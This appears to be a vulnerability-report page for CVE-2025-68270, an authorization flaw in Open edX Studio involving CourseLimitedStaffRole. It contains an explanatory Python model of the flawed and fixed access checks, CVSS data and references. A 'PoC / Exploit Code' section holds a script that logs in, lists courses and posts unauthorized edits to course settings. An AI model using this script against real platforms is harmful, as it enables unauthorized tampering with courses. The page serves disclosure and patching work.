Security Vulnerability Report
CVE-2025-68270 CVSS 9.9 CRITICAL

Published: 2025-12-16 19:16:01
Last Modified: 2026-04-15 00:35:42

Description

The Open edX Platform is a learning management platform. Prior to commit 05d0d0936daf82c476617257aa6c35f0cd4ca060, two authorization gaps (classified as CWE-862, Missing Authorization, in the NVD record below) affect users holding CourseLimitedStaffRole, a role that is not meant to carry any Studio-side access for the course it is granted on. First, if the role is granted on an org rather than on a single course, the holder is able to access and edit that org's courses in Studio. Second, holders are able to list the courses they have the role on in Studio, even though they are not meant to have any access on the Studio side for those courses. Commit 05d0d0936daf82c476617257aa6c35f0cd4ca060 fixes the issue.
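The two gaps above come down to where a role-based Studio check is applied. The model below is an added example written for this report, not edx-platform code: the role names, the grant record, the course-key parsing and every function name are assumptions chosen to illustrate the advisory, and the sample grants are constructed. It shows a pre-fix check that filters denied roles only on course-scoped grants while accepting org-wide grants unconditionally, the fixed check that applies the same test to every grant, a Studio listing that reuses the fixed check, and an audit helper for org-scoped limited-staff grants that an administrator would want to review after patching.

```python
"""Model of the two Studio authorization gaps behind CVE-2025-68270 and
their fix. Illustrative code added to this report, not edx-platform code:
role names, the grant record shape and all function names are assumptions."""
from dataclasses import dataclass
from typing import Iterable, Iterator, List, Optional

# Role identifiers are assumptions modelled on the advisory wording.
COURSE_STAFF = "staff"
LIMITED_STAFF = "limited_staff"

# Roles that must never confer Studio access, whatever scope they are granted on.
STUDIO_DENIED_ROLES = frozenset({LIMITED_STAFF})


@dataclass(frozen=True)
class AccessRole:
    """One role grant. course_id is None for an org-wide grant."""
    user: str
    role: str
    org: str
    course_id: Optional[str] = None


def course_org(course_id: str) -> str:
    """Org part of a course-v1:ORG+NUMBER+RUN key (assumed key format)."""
    return course_id.split(":", 1)[1].split("+", 1)[0]


def matching_grants(grants: Iterable[AccessRole], user: str,
                    course_id: str) -> Iterator[AccessRole]:
    """Grants that apply to (user, course): exact course grants plus org-wide ones."""
    org = course_org(course_id)
    for g in grants:
        if g.user != user:
            continue
        if g.course_id == course_id or (g.course_id is None and g.org == org):
            yield g


def has_studio_write_access_vulnerable(grants, user, course_id) -> bool:
    """Pre-fix behaviour as modelled here: a course-scoped grant is tested
    against the denied list, but an org-wide grant is accepted without its
    role being re-checked, so org-scoped limited_staff reaches Studio."""
    for g in matching_grants(grants, user, course_id):
        if g.course_id is None:               # org-wide grant: role never checked
            return True
        if g.role not in STUDIO_DENIED_ROLES:
            return True
    return False


def has_studio_write_access_fixed(grants, user, course_id) -> bool:
    """Fixed behaviour: the denied-role test applies to every grant,
    whether it is course- or org-scoped."""
    return any(g.role not in STUDIO_DENIED_ROLES
               for g in matching_grants(grants, user, course_id))


def studio_course_list_vulnerable(grants, user, all_courses) -> List[str]:
    """Second gap: the Studio index lists every course the user holds any
    role on, without asking whether that role carries Studio access."""
    return sorted(c for c in all_courses
                  if next(matching_grants(grants, user, c), None) is not None)


def studio_course_list_fixed(grants, user, all_courses) -> List[str]:
    """Fixed listing: reuse the same access check the editor enforces."""
    return sorted(c for c in all_courses
                  if has_studio_write_access_fixed(grants, user, c))


def org_scoped_limited_staff(grants: Iterable[AccessRole]) -> List[AccessRole]:
    """Post-patch audit: org-wide limited_staff grants. The fix stops them
    reaching Studio, but they are worth reviewing because the role is only
    meant to be granted per course."""
    return [g for g in grants if g.role == LIMITED_STAFF and g.course_id is None]


# Constructed sample data (not taken from any real deployment).
GRANTS = [
    AccessRole("alice", LIMITED_STAFF, "TestOrg"),                                  # org-wide
    AccessRole("bob", LIMITED_STAFF, "TestOrg", "course-v1:TestOrg+TEST101+2025"),  # per course
    AccessRole("carol", COURSE_STAFF, "TestOrg", "course-v1:TestOrg+TEST101+2025"),
]
COURSES = [
    "course-v1:TestOrg+TEST101+2025",
    "course-v1:TestOrg+TEST102+2025",
    "course-v1:OtherOrg+INTRO+2025",
]

if __name__ == "__main__":
    for user in ("alice", "bob", "carol"):
        print(user,
              "vulnerable:", studio_course_list_vulnerable(GRANTS, user, COURSES),
              "fixed:", studio_course_list_fixed(GRANTS, user, COURSES))
    print("org-scoped limited_staff grants:", org_scoped_limited_staff(GRANTS))
```

Run as a script to see alice (org-wide limited staff) listed with two editable courses under the vulnerable check and none under the fixed one, while carol (course staff) keeps her course in both. The design point is that a deny rule on a role must be evaluated on the grant itself, never skipped because the grant arrived through org expansion, and that the listing must reuse the access predicate rather than a weaker "holds any role" test.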

CVSS Details

CVSS Score: 9.9
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L

Configurations (Affected Products)

The NVD record carries no CPE configuration data. The affected range stated in the description is:

Open edX Platform (edx-platform) prior to commit 05d0d0936daf82c476617257aa6c35f0cd4ca060

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-68270 PoC - Open edX Platform CourseLimitedStaffRole Privilege Bypass
# This PoC demonstrates unauthorized access to Studio endpoints.
#
# NOTE: the login, course-listing and settings URLs below are this PoC's own
# placeholders; the advisory text in this report does not name any endpoint,
# so adjust them to the target's actual LMS/Studio routes before use.
TARGET_HOST = "https://vulnerable-openedx.example.com"

# Attacker needs an account with CourseLimitedStaffRole at organization level
USERNAME = "[email protected]"
PASSWORD = "password123"
ORGANIZATION_ID = "org_123"
COURSE_ID = "course-v1:TestOrg+TEST101+2025"


def login():
    """Authenticate and obtain a session cookie.

    A 200 only means the login request was answered; a login form that
    re-renders with an error also returns 200, so verify the session works
    (for example by fetching the dashboard) before trusting it.
    """
    session = requests.Session()
    login_url = f"{TARGET_HOST}/login"
    data = {"email": USERNAME, "password": PASSWORD, "next": "/dashboard"}
    response = session.post(login_url, data=data)
    return session if response.status_code == 200 else None


def list_courses(session):
    """List courses (unauthorized access).

    This endpoint should be restricted for limited-staff users but is accessible.
    """
    list_url = f"{TARGET_HOST}/api/course_studio/v1/courses"
    headers = {"Organization": ORGANIZATION_ID}
    response = session.get(list_url, headers=headers)
    print(f"List courses response: {response.status_code}")
    if response.status_code != 200:
        return []
    try:
        courses = response.json()
    except ValueError:  # non-JSON body (e.g. an HTML error page)
        return []
    return courses if isinstance(courses, list) else []


def edit_course(session, course_id):
    """Edit course content (unauthorized access)."""
    edit_url = f"{TARGET_HOST}/course/{course_id}/settings/details"
    payload = {
        "course_name": "Modified by unauthorized user",
        "course_about": "This course was modified via privilege bypass",
    }
    response = session.post(edit_url, data=payload)
    print(f"Edit course response: {response.status_code}")
    return response.status_code == 200


def main():
    session = login()
    if not session:
        print("Login failed")
        return

    # Exploit: list courses the user shouldn't have Studio access to
    courses = list_courses(session)
    print(f"Accessible courses: {courses}")

    # Exploit: modify course content
    for course in courses:
        course_id = course.get("id", COURSE_ID) if isinstance(course, dict) else COURSE_ID
        edit_course(session, course_id)


if __name__ == "__main__":
    main()
```

References

https://github.com/openedx/edx-platform/commit/05d0d0936daf82c476617257aa6c35f0cd4ca060 (fix commit)
https://github.com/openedx/edx-platform/pull/37772
https://github.com/openedx/edx-platform/pull/37773
https://github.com/openedx/edx-platform/security/advisories/GHSA-rh64-vc2h-7wfj (GitHub security advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68270", "sourceIdentifier": "[email protected]", "published": "2025-12-16T19:16:00.720", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Open edX Platform is a learning management platform. Prior to commit 05d0d0936daf82c476617257aa6c35f0cd4ca060, CourseLimitedStaffRole users are able to access and edit courses in studio if they are granted the role on an org rather than on a course, and CourseLimitedStaffRole users are able to list courses they have the role on in studio even though they are not meant to have any access on the studio side for the course. Commit 05d0d0936daf82c476617257aa6c35f0cd4ca060 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/openedx/edx-platform/commit/05d0d0936daf82c476617257aa6c35f0cd4ca060", "source": "[email protected]"}, {"url": "https://github.com/openedx/edx-platform/pull/37772", "source": "[email protected]"}, {"url": "https://github.com/openedx/edx-platform/pull/37773", "source": "[email protected]"}, {"url": "https://github.com/openedx/edx-platform/security/advisories/GHSA-rh64-vc2h-7wfj", "source": "[email protected]"}]}}